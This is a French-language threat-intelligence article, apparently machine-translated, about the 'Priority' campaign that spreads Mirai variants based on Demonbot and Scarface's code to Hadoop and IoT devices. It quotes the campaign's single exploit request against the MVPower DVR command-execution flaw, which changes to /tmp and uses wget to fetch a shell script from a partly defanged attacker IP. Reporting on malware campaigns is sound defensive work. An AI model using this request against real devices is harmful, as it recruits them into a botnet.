Botnet Scarface

Lorsqu'une menace de logiciel malveillant obtient son code source soit divulgué, soit rendu public par les développeurs eux-mêmes, cela permet même aux acteurs moins expérimentés de la prendre, de faire des ajustements pour mieux répondre à leurs besoins et de le libérer dans la nature. Ce comportement exact a été détecté à plusieurs reprises depuis la publication du code du tristement célèbre Mirai Botnet sur les forums de hackers en 2016.

Un acteur menaçant s'identifiant comme étant prioritaire est à l'origine d'une campagne d'attaque impliquant deux variantes de Mirai différentes. La première charge utile déployée était basée sur la variante Demonbot Mirai et se concentrait spécifiquement sur les attaques Hadoop. La deuxième charge utile adoptée plus tard dans la campagne est beaucoup plus avancée et est basée sur la variante Mirai développée par Scarface. Scarface est un développeur de logiciels malveillants connu qui a pris le code Mirai et a tenté de le rendre accessible aux pirates novices plus facilement tout en adaptant la menace pour infecter les appareils de l'Internet des objets (IoT).

La campagne Priority se concentre sur l'analyse de plusieurs ports - 500, 5501, 5502, 5050 et 60001, et sur leur attaque avec une seule commande avec le 'GET / shell? Cd% 20 / tmp;% 20wget% 20http: // 45 ( .) 13.58.4 / TPJ.sh; commander. Selon les analystes d'Infosec qui ont analysé la campagne Priority, l'attaquant semble avoir un objectif spécifique en tête car il cible principalement le port 60001 tandis que les quatre autres servent plus de distraction qu'autre chose. En outre, ils ont déterminé que Priority devait être plutôt inexpérimenté, comme en témoigne le fait qu'une seule vulnérabilité unique a été exploitée comme vecteur de compromis - MVPower DVR Shell Unauthenticated Command Execution, au lieu du nombre habituel de 3 à 7 exploits trouvés dans d'autres des menaces.

Toutes les attaques initiales ont été lancées par une seule adresse IP hébergée sur un serveur privé virtuel (VPS) fourni par Digital Ocean. Les pirates ont souvent recours au VPS en raison de la flexibilité qu'ils offrent pour configurer rapidement un serveur, puis le purger aussi rapidement.